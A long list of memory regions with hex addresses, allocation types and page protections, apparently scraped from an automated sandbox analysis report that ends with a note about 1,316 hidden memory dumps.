page read and write
580B000
stack
page read and write
6586000
heap
page read and write
4FA6000
heap
page read and write
4608000
trusted library allocation
page read and write
7BAA000
heap
page read and write
5DEC000
heap
page read and write
60C5000
heap
page read and write
7D40000
trusted library allocation
page read and write
569B000
trusted library allocation
page read and write
4B8E000
heap
page read and write
4F90000
heap
page read and write
8820000
trusted library allocation
page read and write
5D40000
heap
page read and write
3440000
trusted library allocation
page read and write
5D1E000
heap
page read and write
4240000
trusted library allocation
page read and write
88EE000
stack
page read and write
50C7000
heap
page read and write
67CD000
stack
page read and write
139B000
stack
page read and write
51E0000
heap
page read and write
28F2000
heap
page read and write
4B07000
heap
page read and write
A1D5000
trusted library allocation
page read and write
2771000
heap
page read and write
67BD000
stack
page read and write
6540000
heap
page read and write
5EEB000
trusted library allocation
page read and write
5DCC000
heap
page read and write
29B3000
heap
page read and write
2B30000
heap
page read and write
4FF2000
heap
page read and write
6630000
heap
page read and write
7BF0000
heap
page read and write
2680000
heap
page read and write
723F000
stack
page read and write
1D0000
heap
page read and write
5100000
direct allocation
page read and write
65F2000
heap
page read and write
3329000
heap
page read and write
7100000
trusted library allocation
page read and write
4D30000
trusted library allocation
page read and write
8860000
heap
page read and write
25C0000
heap
page read and write
462E000
stack
page read and write
7C3D000
stack
page read and write
4FF3000
heap
page read and write
5D28000
heap
page read and write
6594000
heap
page read and write
290C000
heap
page read and write
408E000
stack
page read and write
45D000
system
page execute and read and write
304E000
stack
page read and write
65D0000
heap
page read and write
65E0000
heap
page read and write
40F0000
trusted library allocation
page read and write
4CBE000
stack
page read and write
87E0000
trusted library allocation
page execute and read and write
290B000
heap
page read and write
21E000
stack
page read and write
2AD1000
heap
page read and write
60C5000
heap
page read and write
6542000
heap
page read and write
5C44000
heap
page read and write
69BE000
stack
page read and write
4C50000
heap
page read and write
B50000
heap
page read and write
3690000
heap
page read and write
73AE000
stack
page read and write
4FD3000
heap
page read and write
4180000
heap
page read and write
5ED0000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
324E000
stack
page read and write
7050000
trusted library allocation
page read and write
1310000
heap
page read and write
4FB2000
heap
page read and write
47AE000
stack
page read and write
CE6000
heap
page read and write
51DB000
trusted library allocation
page read and write
65AD000
heap
page read and write
B6E000
stack
page read and write
5DB2000
heap
page read and write
70F0000
trusted library allocation
page execute and read and write
6553000
heap
page read and write
D0D000
heap
page read and write
D11000
heap
page read and write
108C000
heap
page read and write
62E0000
trusted library allocation
page execute
5C53000
heap
page read and write
4B41000
heap
page read and write
D2D000
heap
page read and write
10000000
direct allocation
page read and write
5D20000
heap
page read and write
654D000
heap
page read and write
73DD000
stack
page read and write
7070000
trusted library allocation
page read and write
292D000
heap
page read and write
CEE000
heap
page read and write
628D000
heap
page read and write
5055000
heap
page read and write
79F7000
heap
page read and write
47D7000
trusted library allocation
page read and write
727E000
stack
page read and write
5D51000
heap
page read and write
8C60000
trusted library allocation
page read and write
6081000
heap
page read and write
74BE000
stack
page read and write
2A20000
trusted library allocation
page read and write
17D000
stack
page read and write
6740000
trusted library allocation
page read and write
C90000
heap
page read and write
4719000
trusted library allocation
page read and write
65DC000
heap
page read and write
7CEE000
stack
page read and write
40FA000
trusted library allocation
page execute and read and write
2FF0000
heap
page read and write
6EB6000
heap
page read and write
60C8000
heap
page read and write
4B36000
heap
page read and write
8FEC000
stack
page read and write
4FF2000
heap
page read and write
652F000
stack
page read and write
4F9E000
heap
page read and write
2AB0000
heap
page read and write
4783000
heap
page read and write
762E000
stack
page read and write
23E0000
trusted library allocation
page read and write
6F90000
trusted library allocation
page read and write
4761000
trusted library allocation
page read and write
D60000
heap
page read and write
2880000
heap
page read and write
BF4000
stack
page read and write
552E000
stack
page read and write
739C000
stack
page read and write
34B0000
heap
page read and write
7C50000
trusted library allocation
page read and write
731B000
stack
page read and write
510E000
direct allocation
page read and write
4167000
heap
page read and write
345D000
trusted library allocation
page execute and read and write
7C80000
trusted library allocation
page read and write
2800000
heap
page read and write
E2E000
stack
page read and write
4FBE000
heap
page read and write
63D0000
trusted library allocation
page read and write
6594000
heap
page read and write
7AFE000
stack
page read and write
7F90000
trusted library allocation
page read and write
3500000
heap
page read and write
7C9E000
stack
page read and write
528F000
trusted library allocation
page read and write
6F0C000
heap
page read and write
6C67000
heap
page read and write
C38000
heap
page read and write
4780000
heap
page read and write
459000
system
page execute and read and write
2F6D000
stack
page read and write
79C5000
heap
page read and write
D11000
heap
page read and write
316F000
stack
page read and write
7DA0000
trusted library allocation
page read and write
7BE0000
heap
page read and write
3320000
heap
page read and write
86F0000
trusted library allocation
page read and write
65B9000
heap
page read and write
47D7000
trusted library allocation
page read and write
35F1000
heap
page read and write
308E000
stack
page read and write
65D9000
heap
page read and write
5CF0000
heap
page read and write
3487000
trusted library allocation
page execute and read and write
2720000
heap
page read and write
65B3000
heap
page read and write
65D6000
heap
page read and write
654A000
heap
page read and write
4F81000
heap
page read and write
297D000
heap
page read and write
A30000
heap
page read and write
28D1000
heap
page read and write
590C000
stack
page read and write
7B30000
heap
page execute and read and write
4B89000
heap
page read and write
65D2000
heap
page read and write
7E00000
trusted library allocation
page read and write
33BE000
stack
page read and write
290B000
heap
page read and write
D80000
heap
page read and write
60FE000
heap
page read and write
3454000
trusted library allocation
page read and write
6E96000
heap
page read and write
3400000
heap
page read and write
276D000
heap
page read and write
4A41000
trusted library allocation
page read and write
D90000
heap
page read and write
8A01000
heap
page read and write
7D2D000
stack
page read and write
7D80000
trusted library allocation
page read and write
5EDB000
trusted library allocation
page read and write
4765000
trusted library allocation
page read and write
D6B000
heap
page read and write
60E5000
heap
page read and write
3E0F000
stack
page read and write
65B9000
heap
page read and write
6A7B000
stack
page read and write
1424000
heap
page read and write
6E10000
trusted library allocation
page read and write
10F0000
heap
page read and write
4E2F000
stack
page read and write
654A000
heap
page read and write
54B9000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
4B89000
heap
page read and write
E60000
heap
page read and write
6320000
trusted library allocation
page read and write
65D0000
heap
page read and write
3469000
trusted library allocation
page read and write
79BA000
heap
page read and write
76EE000
stack
page read and write
6FD4000
trusted library allocation
page read and write
5DCC000
heap
page read and write
4CBF000
heap
page read and write
64A0000
trusted library allocation
page read and write
6050000
trusted library allocation
page read and write
6594000
heap
page read and write
7BD4000
heap
page read and write
40E0000
trusted library allocation
page read and write
86E0000
trusted library allocation
page execute and read and write
695A000
stack
page read and write
2749000
heap
page read and write
6113000
heap
page read and write
D2D000
heap
page read and write
4510000
trusted library allocation
page read and write
CEB000
heap
page read and write
50CC000
stack
page read and write
2939000
heap
page read and write
476E000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
5C93000
heap
page read and write
6F0E000
stack
page read and write
56CE000
stack
page read and write
2730000
heap
page readonly
1E0000
heap
page read and write
3376000
heap
page read and write
4B3C000
heap
page read and write
334F000
stack
page read and write
70E000
stack
page read and write
27E6000
heap
page read and write
5D45000
heap
page read and write
65C7000
heap
page read and write
D2D000
heap
page read and write
970000
heap
page read and write
8810000
trusted library allocation
page read and write
65D4000
heap
page read and write
70DD000
stack
page read and write
CE3000
heap
page read and write
28DE000
heap
page read and write
51B0000
heap
page read and write
65FE000
stack
page read and write
6113000
heap
page read and write
4B2B000
heap
page read and write
4B21000
heap
page read and write
65B9000
heap
page read and write
47C0000
heap
page read and write
7B7E000
stack
page read and write
33AF000
stack
page read and write
D12000
heap
page read and write
A40000
heap
page read and write
29BB000
heap
page read and write
60D4000
heap
page read and write
2D2F000
stack
page read and write
26F0000
heap
page read and write
5FA1000
trusted library allocation
page read and write
69D0000
trusted library allocation
page read and write
7CB7000
trusted library allocation
page read and write
4681000
trusted library allocation
page read and write
352E000
heap
page read and write
5D17000
heap
page read and write
5C14000
heap
page read and write
6113000
heap
page read and write
5DCD000
heap
page read and write
7F660000
trusted library allocation
page execute and read and write
26E9000
trusted library allocation
page read and write
6586000
heap
page read and write
65D2000
heap
page read and write
6EA9000
heap
page read and write
28FF000
heap
page read and write
8700000
trusted library allocation
page read and write
5DBC000
heap
page read and write
4F70000
heap
page read and write
3420000
heap
page read and write
5B93000
heap
page read and write
65C7000
heap
page read and write
7190000
trusted library allocation
page read and write
65AD000
heap
page read and write
12EF000
stack
page read and write
7DD0000
trusted library allocation
page read and write
789E000
stack
page read and write
791E000
stack
page read and write
35A1000
heap
page read and write
4FFF000
stack
page read and write
4B89000
heap
page read and write
2E8C000
stack
page read and write
C52000
heap
page read and write
60C7000
heap
page read and write
654A000
heap
page read and write
41CF000
stack
page read and write
6E20000
trusted library allocation
page read and write
AFC000
stack
page read and write
26DD000
trusted library allocation
page execute and read and write
76AE000
stack
page read and write
5D1E000
heap
page read and write
50BB000
heap
page read and write
26D0000
trusted library allocation
page read and write
143F000
heap
page read and write
2AED000
heap
page read and write
7DF1000
heap
page read and write
65D4000
heap
page read and write
29B5000
heap
page read and write
28DE000
heap
page read and write
64D0000
heap
page read and write
26DE000
unkown
page read and write
5DCE000
heap
page read and write
7C90000
trusted library allocation
page read and write
55A2000
trusted library allocation
page read and write
4B5C000
heap
page read and write
734E000
stack
page read and write
5080000
heap
page read and write
6450000
trusted library allocation
page read and write
3782000
heap
page read and write
5D4C000
heap
page read and write
4FEE000
heap
page read and write
49D9000
trusted library allocation
page read and write
5208000
trusted library allocation
page read and write
29F0000
trusted library allocation
page execute and read and write
6E0C000
stack
page read and write
4F7C000
heap
page read and write
334E000
stack
page read and write
2ABC000
heap
page read and write
7CB0000
trusted library allocation
page read and write
65BF000
heap
page read and write
4100000
trusted library allocation
page read and write
7972000
heap
page read and write
26C0000
trusted library allocation
page read and write
5ED7000
trusted library allocation
page read and write
6F8D000
stack
page read and write
65AD000
heap
page read and write
654C000
heap
page read and write
5D3C000
heap
page read and write
12C000
stack
page read and write
7A50000
heap
page read and write
F9E000
stack
page read and write
4CBE000
heap
page read and write
28F2000
heap
page read and write
1080000
heap
page read and write
CD0000
heap
page read and write
754E000
stack
page read and write
50D5000
heap
page read and write
4C41000
heap
page read and write
300E000
stack
page read and write
4FC6000
heap
page read and write
79B4000
heap
page read and write
65E0000
heap
page read and write
30E0000
heap
page read and write
CF5000
heap
page read and write
4C50000
heap
page read and write
10CE000
stack
page read and write
7BCD000
trusted library allocation
page read and write
AEE000
stack
page read and write
65F2000
heap
page read and write
5052000
direct allocation
page read and write
29B7000
heap
page read and write
65C7000
heap
page read and write
7A60000
trusted library allocation
page read and write
7AF3000
heap
page read and write
29AC000
heap
page read and write
2912000
heap
page read and write
7FD48000
trusted library allocation
page execute and read and write
6C72000
heap
page read and write
60D1000
heap
page read and write
2AF5000
heap
page read and write
65F2000
heap
page read and write
65D4000
heap
page read and write
71FE000
stack
page read and write
3798000
heap
page read and write
11E0000
heap
page read and write
A1D0000
trusted library allocation
page read and write
57CF000
stack
page read and write
4F79000
heap
page read and write
1444000
heap
page read and write
4735000
trusted library allocation
page read and write
69D9000
heap
page read and write
657D000
heap
page read and write
79D0000
heap
page read and write
6F4E000
stack
page read and write
4F7C000
heap
page read and write
CF9000
heap
page read and write
766E000
stack
page read and write
287E000
stack
page read and write
7C5E000
stack
page read and write
400000
system
page execute and read and write
7B60000
trusted library allocation
page execute and read and write
25A9000
heap
page read and write
69DF000
heap
page read and write
657C000
heap
page read and write
7C10000
heap
page execute and read and write
4FEA000
heap
page read and write
689E000
stack
page read and write
7700000
heap
page read and write
5DCC000
heap
page read and write
60D3000
heap
page read and write
701E000
stack
page read and write
515E000
stack
page read and write
2A00000
heap
page execute and read and write
3482000
trusted library allocation
page read and write
26F0000
heap
page read and write
1455000
heap
page read and write
4CBD000
heap
page read and write
5298000
trusted library allocation
page read and write
34A0000
trusted library allocation
page read and write
692E000
stack
page read and write
60D1000
heap
page read and write
510E000
stack
page read and write
6A80000
heap
page read and write
735E000
stack
page read and write
2910000
heap
page read and write
89F0000
heap
page read and write
705E000
stack
page read and write
7360000
heap
page execute and read and write
23C0000
heap
page read and write
4B2D000
heap
page read and write
5B91000
heap
page read and write
7B50000
trusted library allocation
page read and write
6F7E000
stack
page read and write
5D28000
heap
page read and write
3453000
trusted library allocation
page execute and read and write
6539000
heap
page read and write
CED000
heap
page read and write
7160000
trusted library allocation
page read and write
400000
system
page execute and read and write
680A000
stack
page read and write
D2D000
heap
page read and write
6EC7000
heap
page read and write
7430000
heap
page read and write
65BF000
heap
page read and write
CE7000
heap
page read and write
60E5000
heap
page read and write
2923000
trusted library allocation
page execute and read and write
5DCD000
heap
page read and write
54E8000
trusted library allocation
page read and write
86D0000
heap
page read and write
7BAE000
heap
page read and write
4771000
trusted library allocation
page read and write
65DD000
heap
page read and write
6C10000
heap
page read and write
28BE000
stack
page read and write
6E68000
heap
page read and write
A40000
heap
page read and write
4FF2000
heap
page read and write
290B000
heap
page read and write
76EA000
stack
page read and write
7BCA000
heap
page read and write
56A9000
trusted library allocation
page read and write
D04000
heap
page read and write
8800000
heap
page read and write
5DBC000
heap
page read and write
2779000
heap
page read and write
CE7000
heap
page read and write
4B73000
heap
page read and write
7030000
trusted library allocation
page read and write
670B000
stack
page read and write
4E6E000
stack
page read and write
4FA1000
trusted library allocation
page read and write
521F000
stack
page read and write
2920000
trusted library allocation
page read and write
5070000
heap
page read and write
511E000
stack
page read and write
7A70000
trusted library allocation
page read and write
6E86000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
4D40000
heap
page read and write
5461000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
65D9000
heap
page read and write
64EE000
stack
page read and write
D12000
heap
page read and write
4E9D000
stack
page read and write
65B3000
heap
page read and write
4FC3000
heap
page read and write
654A000
heap
page read and write
40E9000
trusted library allocation
page read and write
6594000
heap
page read and write
654C000
heap
page read and write
7A70000
trusted library allocation
page execute and read and write
65F2000
heap
page read and write
4B1D000
heap
page read and write
456000
system
page execute and read and write
7962000
heap
page read and write
16A000
stack
page read and write
2610000
heap
page read and write
5071000
heap
page read and write
5D14000
heap
page read and write
5D4F000
heap
page read and write
50F7000
trusted library allocation
page read and write
4C5C000
heap
page read and write
1417000
heap
page read and write
4FF2000
heap
page read and write
290B000
heap
page read and write
D2D000
heap
page read and write
7DC0000
trusted library allocation
page read and write
CF8000
heap
page read and write
65F2000
heap
page read and write
685B000
stack
page read and write
654E000
heap
page read and write
2702000
trusted library allocation
page read and write
87F0000
trusted library allocation
page read and write
2ACA000
heap
page read and write
6400000
trusted library allocation
page read and write
4EA0000
trusted library allocation
page execute and read and write
5EDF000
trusted library allocation
page read and write
65B3000
heap
page read and write
149E000
heap
page read and write
A50000
heap
page read and write
54B1000
trusted library allocation
page read and write
BDB000
stack
page read and write
656E000
heap
page read and write
8A0D000
heap
page read and write
6F28000
heap
page read and write
7E19000
heap
page read and write
CF4000
heap
page read and write
5D16000
heap
page read and write
6FB0000
trusted library allocation
page read and write
5DCC000
heap
page read and write
8C50000
trusted library allocation
page read and write
4B35000
heap
page read and write
4F8A000
heap
page read and write
7DED000
heap
page read and write
4DEE000
stack
page read and write
2912000
heap
page read and write
69E8000
heap
page read and write
65E0000
heap
page read and write
335B000
heap
page read and write
7CC0000
trusted library allocation
page read and write
6FA0000
trusted library allocation
page execute and read and write
4FF2000
heap
page read and write
46E2000
trusted library allocation
page read and write
5053000
heap
page read and write
4FD6000
heap
page read and write
4F84000
heap
page read and write
5D39000
heap
page read and write
68AE000
stack
page read and write
4B6E000
heap
page read and write
7A80000
trusted library allocation
page read and write
4B81000
heap
page read and write
65DC000
heap
page read and write
654C000
heap
page read and write
3591000
heap
page read and write
4FA9000
heap
page read and write
1E5000
heap
page read and write
73EE000
stack
page read and write
6BCE000
stack
page read and write
65C7000
heap
page read and write
7DA2000
heap
page read and write
9BE000
stack
page read and write
2A8F000
stack
page read and write
6113000
heap
page read and write
6765000
trusted library allocation
page read and write
65D0000
heap
page read and write
1DE000
stack
page read and write
65D9000
heap
page read and write
6542000
heap
page read and write
4230000
trusted library allocation
page execute and read and write
65D6000
heap
page read and write
71C0000
trusted library allocation
page read and write
5053000
heap
page read and write
79F9000
heap
page read and write
79A6000
heap
page read and write
766B000
stack
page read and write
5046000
direct allocation
page read and write
29B8000
heap
page read and write
6EF3000
heap
page read and write
EDE000
stack
page read and write
34A0000
trusted library allocation
page read and write
6C4E000
stack
page read and write
65A7000
heap
page read and write
2616000
heap
page read and write
65AD000
heap
page read and write
89FC000
heap
page read and write
50DE000
stack
page read and write
26E0000
trusted library allocation
page read and write
6F0C000
stack
page read and write
E70000
heap
page read and write
5DEC000
heap
page read and write
4CBF000
heap
page read and write
135E000
stack
page read and write
27C2000
heap
page read and write
2336000
stack
page read and write
6EC3000
heap
page read and write
4B7B000
heap
page read and write
6D41000
heap
page read and write
6113000
heap
page read and write
4DBD000
trusted library allocation
page read and write
7D2E000
stack
page read and write
1050000
heap
page read and write
6C3F000
heap
page read and write
26E0000
heap
page read and write
6E72000
trusted library allocation
page read and write
5DCC000
heap
page read and write
7560000
trusted library allocation
page execute and read and write
6FC0000
trusted library allocation
page read and write
65B3000
heap
page read and write
69CD000
trusted library allocation
page read and write
4FDE000
heap
page read and write
D06000
heap
page read and write
61C1000
trusted library allocation
page read and write
B2E000
stack
page read and write
4F6F000
stack
page read and write
145E000
heap
page read and write
422C000
stack
page read and write
4B00000
heap
page read and write
60D4000
heap
page read and write
111A000
heap
page read and write
542E000
stack
page read and write
7FD30000
trusted library allocation
page execute and read and write
5C42000
heap
page read and write
4250000
heap
page read and write
50BA000
heap
page read and write
5DCC000
heap
page read and write
65DC000
heap
page read and write
7D71000
trusted library allocation
page read and write
B5B000
heap
page read and write
65F0000
heap
page read and write
50C7000
heap
page read and write
470E000
stack
page read and write
13C000
stack
page read and write
7ADE000
stack
page read and write
6C8E000
stack
page read and write
2912000
heap
page read and write
4920000
heap
page read and write
51F9000
trusted library allocation
page read and write
13FF000
heap
page read and write
5292000
trusted library allocation
page read and write
4E5C000
stack
page read and write
28D0000
heap
page read and write
4FDE000
heap
page read and write
7A90000
trusted library allocation
page read and write
D16000
heap
page read and write
292D000
trusted library allocation
page execute and read and write
65D0000
heap
page read and write
40CE000
stack
page read and write
6551000
heap
page read and write
5E1D000
trusted library allocation
page read and write
4DF0000
heap
page readonly
8D71000
trusted library allocation
page read and write
A25E000
stack
page read and write
60E3000
heap
page read and write
8C70000
trusted library allocation
page read and write
65DC000
heap
page read and write
4F99000
heap
page read and write
6FE0000
trusted library allocation
page read and write
5D20000
heap
page read and write
79D7000
heap
page read and write
4FF2000
heap
page read and write
65B4000
heap
page read and write
65D2000
heap
page read and write
7FC000
stack
page read and write
66CD000
stack
page read and write
7CA000
stack
page read and write
47DB000
trusted library allocation
page read and write
65D2000
heap
page read and write
5C4B000
heap
page read and write
9FE000
stack
page read and write
3790000
heap
page read and write
4FFC000
trusted library allocation
page read and write
4FF2000
heap
page read and write
65D2000
heap
page read and write
51DF000
trusted library allocation
page read and write
2720000
trusted library allocation
page read and write
4C4F000
heap
page read and write
BCB000
heap
page read and write
5170000
heap
page read and write
65C7000
heap
page read and write
43E000
stack
page read and write
2E4F000
stack
page read and write
7C89000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
A40000
heap
page read and write
654A000
heap
page read and write
297D000
heap
page read and write
7DF0000
trusted library allocation
page read and write
5D1E000
heap
page read and write
CFA000
heap
page read and write
2F2C000
stack
page read and write
4670000
heap
page execute and read and write
3588000
heap
page read and write
60E5000
heap
page read and write
32AF000
stack
page read and write
5060000
direct allocation
page read and write
2A3A000
heap
page read and write
5825000
trusted library allocation
page read and write
3090000
heap
page read and write
5000000
direct allocation
page read and write
79EE000
heap
page read and write
277C000
heap
page read and write
7966000
heap
page read and write
60C8000
heap
page read and write
65F0000
heap
page read and write
4257000
heap
page read and write
26D4000
trusted library allocation
page read and write
2914000
heap
page read and write
7CB0000
trusted library allocation
page read and write
65D0000
heap
page read and write
4B2E000
heap
page read and write
582B000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
6C0F000
stack
page read and write
3450000
trusted library allocation
page read and write
8180000
trusted library allocation
page read and write
4CBD000
heap
page read and write
3170000
heap
page read and write
79E7000
heap
page read and write
52ED000
stack
page read and write
69BE000
stack
page read and write
410C000
stack
page read and write
5BD3000
heap
page read and write
27FF000
stack
page read and write
7A60000
trusted library allocation
page read and write
400000
system
page execute and read and write
4F75000
heap
page read and write
4B55000
heap
page read and write
65AD000
heap
page read and write
238E000
stack
page read and write
8771000
trusted library allocation
page read and write
2C8E000
stack
page read and write
68DE000
stack
page read and write
7D30000
trusted library allocation
page read and write
7BFE000
stack
page read and write
65B9000
heap
page read and write
6E6D000
stack
page read and write
C92000
heap
page read and write
65C5000
heap
page read and write
79EB000
heap
page read and write
6594000
heap
page read and write
6080000
heap
page read and write
4B90000
heap
page read and write
3509000
heap
page read and write
65D9000
heap
page read and write
6570000
heap
page execute and read and write
65AC000
heap
page read and write
7BBF000
stack
page read and write
7140000
trusted library allocation
page read and write
CD0000
heap
page read and write
5FA000
stack
page read and write
6FBE000
stack
page read and write
60CA000
heap
page read and write
3469000
trusted library allocation
page read and write
5DCD000
heap
page read and write
35AF000
stack
page read and write
64D1000
heap
page read and write
6008000
trusted library allocation
page read and write
65D6000
heap
page read and write
6E8E000
trusted library allocation
page read and write
D2D000
heap
page read and write
65FB000
heap
page read and write
691E000
stack
page read and write
4D14000
trusted library allocation
page read and write
4FDB000
heap
page read and write
6CC000
stack
page read and write
6430000
heap
page read and write
61E9000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
60E3000
heap
page read and write
CD0000
heap
page read and write
7550000
heap
page read and write
5B92000
heap
page read and write
6A2E000
stack
page read and write
265F000
stack
page read and write
D18000
heap
page read and write
4F96000
heap
page read and write
56A4000
trusted library allocation
page read and write
4FDD000
stack
page read and write
65E0000
heap
page read and write
60C5000
heap
page read and write
65D4000
heap
page read and write
4FF2000
heap
page read and write
252C000
stack
page read and write
4FF2000
heap
page read and write
2725000
heap
page read and write
65D4000
heap
page read and write
474000
remote allocation
page execute and read and write
7B3F000
stack
page read and write
654E000
heap
page read and write
7D70000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
746D000
stack
page read and write
65D0000
heap
page read and write
89F9000
heap
page read and write
26D3000
trusted library allocation
page execute and read and write
6C5E000
heap
page read and write
6EB1000
heap
page read and write
10FB000
stack
page read and write
60E3000
heap
page read and write
5232000
trusted library allocation
page read and write
6586000
heap
page read and write
65E0000
heap
page read and write
BCE000
stack
page read and write
55AC000
trusted library allocation
page read and write
5C14000
heap
page read and write
4A43000
trusted library allocation
page read and write
5C50000
heap
page read and write
74EB000
stack
page read and write
65B9000
heap
page read and write
5D20000
heap
page read and write
5053000
heap
page read and write
8C40000
trusted library allocation
page read and write
4C5C000
heap
page read and write
414E000
stack
page read and write
60CC000
heap
page read and write
65D9000
heap
page read and write
5DBA000
heap
page read and write
6380000
trusted library allocation
page read and write
DEE000
stack
page read and write
1F0000
heap
page read and write
7365000
heap
page execute and read and write
850000
heap
page read and write
473000
system
page execute and read and write
BBE000
stack
page read and write
4C20000
heap
page read and write
772E000
stack
page read and write
5D28000
heap
page read and write
4F71000
heap
page read and write
5287000
trusted library allocation
page read and write
29B5000
heap
page read and write
D2D000
heap
page read and write
D07000
heap
page read and write
6405000
heap
page read and write
3482000
trusted library allocation
page read and write
65AD000
heap
page read and write
60D1000
heap
page read and write
6DC000
stack
page read and write
79E3000
heap
page read and write
4CBF000
heap
page read and write
7DE0000
trusted library allocation
page read and write
50C0000
direct allocation
page read and write
7130000
trusted library allocation
page read and write
47F0000
heap
page read and write
6F30000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page execute and read and write
519F000
stack
page read and write
10001000
direct allocation
page execute and read and write
65E0000
heap
page read and write
3480000
trusted library allocation
page read and write
2931000
heap
page read and write
7C40000
trusted library allocation
page read and write
2720000
heap
page read and write
28F2000
heap
page read and write
45DD000
stack
page read and write
6113000
heap
page read and write
65BF000
heap
page read and write
2924000
trusted library allocation
page read and write
C30000
heap
page read and write
312E000
stack
page read and write
330F000
stack
page read and write
5B40000
heap
page read and write
EE0000
heap
page read and write
4F2E000
stack
page read and write
65D0000
heap
page read and write
8021000
trusted library allocation
page read and write
3D0E000
stack
page read and write
5FC9000
trusted library allocation
page read and write
7CE0000
trusted library allocation
page read and write
52C7000
trusted library allocation
page read and write
3480000
trusted library allocation
page read and write
7D6E000
stack
page read and write
858000
heap
page read and write
CF6000
heap
page read and write
6081000
heap
page read and write
55A0000
trusted library allocation
page read and write
886E000
stack
page read and write
8DB5000
trusted library allocation
page read and write
CFF000
stack
page read and write
7CB000
stack
page read and write
6280000
trusted library allocation
page read and write
416E000
stack
page read and write
6580000
heap
page read and write
7A80000
trusted library section
page read and write
2FCE000
stack
page read and write
4B33000
heap
page read and write
28F2000
heap
page read and write
71A0000
trusted library allocation
page read and write
8FAC000
stack
page read and write
D70000
heap
page read and write
7040000
trusted library allocation
page read and write
69AD000
trusted library allocation
page read and write
65B9000
heap
page read and write
60D1000
heap
page read and write
7730000
heap
page read and write
C9D000
heap
page read and write
65DC000
heap
page read and write
65D0000
heap
page read and write
72BF000
stack
page read and write
BC5000
heap
page read and write
69D9000
trusted library allocation
page read and write
65D2000
heap
page read and write
65D2000
heap
page read and write
303C000
stack
page read and write
510E000
direct allocation
page read and write
7DB0000
trusted library allocation
page read and write
5054000
heap
page read and write
5D51000
heap
page read and write
88AD000
stack
page read and write
5DCC000
heap
page read and write
5D20000
heap
page read and write
4C61000
heap
page read and write
6B3F000
stack
page read and write
5D3A000
heap
page read and write
6BD0000
trusted library allocation
page read and write
5DB1000
heap
page read and write
28FC000
heap
page read and write
60D4000
heap
page read and write
2884000
heap
page read and write
6AFE000
stack
page read and write
B20000
heap
page read and write
4A3D000
trusted library allocation
page read and write
5B92000
heap
page read and write
CCD000
heap
page read and write
65E0000
heap
page read and write
4DFE000
stack
page read and write
65D4000
heap
page read and write
65BF000
heap
page read and write
6D21000
heap
page read and write
6FD0000
trusted library allocation
page read and write
709E000
stack
page read and write
F00000
heap
page read and write
4B2C000
heap
page read and write
2930000
heap
page read and write
4FCE000
heap
page read and write
CE9000
heap
page read and write
663E000
stack
page read and write
32CE000
stack
page read and write
7C6E000
stack
page read and write
33FE000
stack
page read and write
466E000
stack
page read and write
6ECE000
stack
page read and write
654C000
heap
page read and write
2FE0000
heap
page read and write
66FE000
stack
page read and write
5681000
trusted library allocation
page read and write
6586000
heap
page read and write
There are 1316 hidden memdumps, click here to show them.